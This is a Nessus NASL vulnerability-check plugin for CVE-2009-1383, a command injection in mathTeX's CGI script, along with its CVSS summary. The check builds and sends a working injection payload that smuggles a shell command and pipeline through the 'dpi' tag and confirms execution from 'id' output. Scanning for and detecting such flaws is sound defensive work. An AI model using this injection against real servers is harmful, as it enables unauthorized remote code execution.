CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
85.1%
The remote web server hosts mathTeX, a CGI script for displaying math on the web.
The version of this application installed on the remote host fails to strip shell metacharacters from the ‘dpi’ and ‘density’ tags of an expression in its ‘getdirective’ function before passing the value to a call to the Perl ‘system()’ function.
An unauthenticated, remote attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges under which the web server operates.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Plugin registration. Everything in this block is metadata that Nessus
# records and reports; nothing here touches the target. The active check
# starts after the exit(0) at the end of the block.
if (description)
{
script_id(49778);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
# CVE-2009-1383 / BID 43599: OS command injection (CWE-78, set below) in
# mathTeX's handling of the dpi tag inside getdirective.
script_cve_id("CVE-2009-1383");
script_bugtraq_id(43599);
script_name(english:"mathTeX mathtex.cgi getdirective Function dpi Tag Arbitrary Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a CGI script that allows execution of
arbitrary commands.");
script_set_attribute(attribute:"description", value:
"The remote web server hosts mathTeX, a CGI script for displaying math
on the web.
The version of this application installed on the remote host fails to
sanitize input via the 'dpi' or 'density' tags in an expression of
shell metacharacters in the 'getdirective' function before using it
in a call to the Perl 'system()' function.
An unauthenticated, remote attacker can leverage this issue to execute
arbitrary code on the remote host subject to the privileges under
which the web server operates.");
script_set_attribute(attribute:"see_also", value:"http://ocert.org/advisories/ocert-2009-010.html");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2009/Jul/75");
# https://groups.google.com/forum/#!topic/comp.text.tex/XVbT10Q1FXg
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f7e19804");
script_set_attribute(attribute:"solution", value:
"Upgrade to a version of mathTeX released on or after July 13th, 2009.");
# Base vector: reachable over the network, low complexity, no
# authentication, partial impact on confidentiality/integrity/availability.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
# No public exploit is recorded, but the plugin itself demonstrates the
# flaw by running a command on the target (exploited_by_nessus).
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_cwe_id(78);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/05/25");
script_set_attribute(attribute:"patch_publication_date", value:"2009/05/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
# ACT_ATTACK: the check below actively exploits the flaw (it executes
# 'id' on the target) rather than fingerprinting a version.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
# Honour the global setting that turns CGI scanning off.
script_exclude_keys("Settings/disable_cgi_scanning");
# Runs only where an HTTP service was detected (or on port 80).
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");
include("data_protection.inc");
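# Target port: the detected HTTP service, falling back to 80.
port = get_http_port(default:80);

# Command to run on the target and the pattern that proves it ran.
cmd = 'id';
cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";

# Per-request marker planted in the injected command line so the target's
# process list can be searched for *this* request and not another one.
magic = SCRIPT_NAME + '-' + unixtime();

# Shell pipeline, executed on the target, that recovers the path of the
# GIF mathTeX is producing for this request: find the process whose
# command line carries the marker and cut the '.gif' path out of it.
# NOTE(review): the pipeline used to end in '| tee /tmp/foo4', a leftover
# debugging tap that wrote a file at a fixed path in world-writable /tmp
# on every scanned host (an artifact left behind, and a symlink-following
# write as the web-server user). tee passes its input through unchanged,
# so dropping it does not alter what the substitution yields.
find_file = 'ps ax | ' +
  'fgrep "' + magic + '" | ' +
  'egrep "/[0-9a-fA-F]+\\.gif" | ' +
  'tail -1 | ' +
  'sed -n -e \'s/.*dvips.ps //\' -e \'s/gif >convert.*/gif/p\'';

# Redirect the command's output into that GIF so it comes back in the
# HTTP response body; the trailing echo is what plants the marker.
exploit = cmd + ' > $(' + find_file + ') | echo ' + magic + ' ';

# \dpi{150|...}: per the advisory the tag value reaches a shell without
# sanitisation, so the pipe ends the number and starts our command.
expr = "\dvips" +
  "\dpi{150|" + urlencode(str:exploit) + "}";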
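# Candidate directories: the two known mathTeX locations plus every CGI
# directory discovered so far; in non-thorough mode only the latter.
if (thorough_tests) dirs = list_uniq(make_list("/mathtex", "/cgi-bin/mathtex", cgi_dirs()));
else dirs = make_list(cgi_dirs());

output = "";              # body of the first response containing command output
mathtex_installs = 0;     # responses that looked like mathTeX, affected or not
vuln_urls = make_list();  # every URL on which the injected command ran

foreach dir (dirs)
{
  foreach ext (make_list(".cgi", ".pl"))
  {
    url = dir + '/mathtex' + ext + '?' + expr;
    res = http_send_recv3(port:port, method:"GET", item:url, exit_on_fail:TRUE);
    if (!res[2]) continue;

    headers = parse_http_headers(status_line:res[0], headers:res[1]);
    if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');

    # A GIF response is taken as evidence that the script is present.
    # Anything else is skipped unless paranoid reporting is on, in which
    # case the body is still checked for command output. (An earlier,
    # unused lookup of the misspelt key 'content_type' has been removed;
    # the header parser exposes it as 'content-type'.)
    if (headers['content-type'] && 'image/gif' >< headers['content-type'])
    {
      mathtex_installs++;
    }
    else if (report_paranoia < 2)
    {
      continue;
    }

    # The exploit string redirects the command's output into the image file
    # that is served back, so a uid=/gid= line in the body proves execution.
    if (egrep(pattern:cmd_pat, string:res[2]))
    {
      vuln_urls = make_list(vuln_urls, url);
      if (!output) output = res[2];
      break;  # one extension per directory is enough
    }
  }
  # Stop at the first exploitable install unless thorough tests want all.
  if (output && !thorough_tests) break;
}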
# Reporting. Any URL that returned the command's output makes the host
# exploitable; otherwise explain in the exit message why nothing was flagged.
n_vuln = max_index(vuln_urls);
if (n_vuln)
{
  if (report_verbosity > 0)
  {
    plural = '';
    if (n_vuln > 1) plural = 's';

    hdr =
      "Nessus was able to execute the command '" + cmd + "' on the remote" + '\n' +
      'host using the following URL' + plural;

    tail = '';
    if (report_verbosity > 1)
    {
      # Captured output is shown only at the highest verbosity, with the
      # uid/gid details scrubbed by the data-protection helper.
      rule = crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
      tail =
        'This produced the following output :\n' +
        '\n' +
        rule +
        data_protection::sanitize_uid(output:output) +
        rule +
        '\n';
    }
    tail +=
      'Note that some browsers will try to render the response from the URL' + plural + '\n' +
      'above as an image and display an error rather than command output. If\n' +
      'this happens, try an alternate browser or send the request manually.\n';

    security_hole(port:port, extra:get_vuln_report(items:vuln_urls, port:port, header:hdr, trailer:tail));
  }
  else security_hole(port);
  exit(0);
}

# Nothing exploitable: tailor the message to how many installs were seen.
if (mathtex_installs == 0) exit(0, "No installs of mathTeX were found on the web server on port "+port+".");
if (mathtex_installs == 1) exit(0, "The mathTeX install hosted on the web server on port "+port+" is not affected.");
exit(0, "The mathTeX installs hosted on the web server on port "+port+" are not affected.");